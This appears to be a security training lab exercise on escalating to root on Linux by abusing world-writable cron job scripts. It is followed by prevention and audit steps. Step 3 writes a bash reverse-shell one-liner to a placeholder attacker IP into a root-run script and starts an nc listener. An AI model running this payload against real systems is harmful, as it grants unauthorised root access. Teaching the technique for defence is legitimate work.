Logo Light

Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 20: Privilege Escalation through World-Writable Cron Jobs

by | Apr 12, 2025 | 0 comments

Objective: Learn how to identify and exploit world-writable cron jobs to escalate privileges on a Linux system, and understand how to secure cron jobs to prevent such vulnerabilities.

Scenario: Cron jobs are scheduled tasks that run automatically at specified intervals. If a cron job script is world-writable and runs with elevated privileges (e.g., root), an attacker can modify it to execute malicious code. Your task is to identify such vulnerabilities, exploit them, and implement proper security measures.

Lab Setup

  1. Environment:
    • A Linux system with at least one world-writable cron job.
  2. Tools Required:
    • Access to the crontab command.
    • A text editor (e.g., vim, nano).

Lab Steps

Step 1: Identify Cron Jobs

  1. Check cron jobs for the current user: crontab -l
  2. Inspect the system-wide cron jobs in /etc/crontab: cat /etc/crontab
  3. Check cron directories for scheduled scripts: ls -l /etc/cron.*
    • Common directories:
      • /etc/cron.d/
      • /var/spool/cron/
      • /etc/cron.daily/, /etc/cron.hourly/, /etc/cron.weekly/
  4. Identify scripts or files with world-writable permissions: find / -type f -perm -0002 2>/dev/null

Step 2: Analyze the Vulnerability

  1. Locate a vulnerable cron job script.
    • Example entry in /etc/crontab: * * * * * root /tmp/vulnerable.sh
    • Check the permissions of the script: ls -l /tmp/vulnerable.sh
      • Output indicating world-writable permissions: -rw-rw-rw- 1 root root 1234 Jan 1 12:00 /tmp/vulnerable.sh

Step 3: Exploit the Cron Job

  1. Edit the vulnerable script to include malicious code: echo 'bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1' > /tmp/vulnerable.sh chmod +x /tmp/vulnerable.sh
    • Replace <attacker_ip> with your machine’s IP address.
  2. Set up a listener on your attack machine: nc -lvnp 4444
  3. Wait for the cron job to execute and connect back to your listener.

Step 4: Verify Privilege Escalation

  1. Once the reverse shell connects, verify your privileges: whoami
    • Expected output: root.

Solution

Explanation:

  • Cron jobs run with the permissions of the user who scheduled them. If a script executed by a cron job is world-writable, attackers can modify it to execute malicious code with elevated privileges.

Prevention:

  1. Secure File Permissions:
    • Ensure cron job scripts are not world-writable: chmod 700 /path/to/script chown root:root /path/to/script
  2. Audit Cron Jobs:
    • Regularly review cron jobs and their associated scripts for misconfigurations: find /etc/cron.* /var/spool/cron -type f -perm -0002 2>/dev/null
  3. Restrict User Access:
    • Limit access to sensitive directories and files.
    • Use /etc/cron.allow and /etc/cron.deny to control who can create cron jobs.
  4. Monitor Cron Activity:
    • Log cron job executions and monitor for suspicious changes.

Testing and Verification

  1. Recheck permissions for all cron job scripts after mitigation.
  2. Attempt to modify the script as a non-root user to confirm it is no longer writable.
  3. Verify that cron jobs execute as intended without vulnerabilities.

Reflection

This exercise demonstrates the risks of misconfigured cron jobs and the importance of securing scheduled tasks. By identifying and exploiting world-writable cron jobs, you’ve gained insights into securing cron configurations to prevent privilege escalation.

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *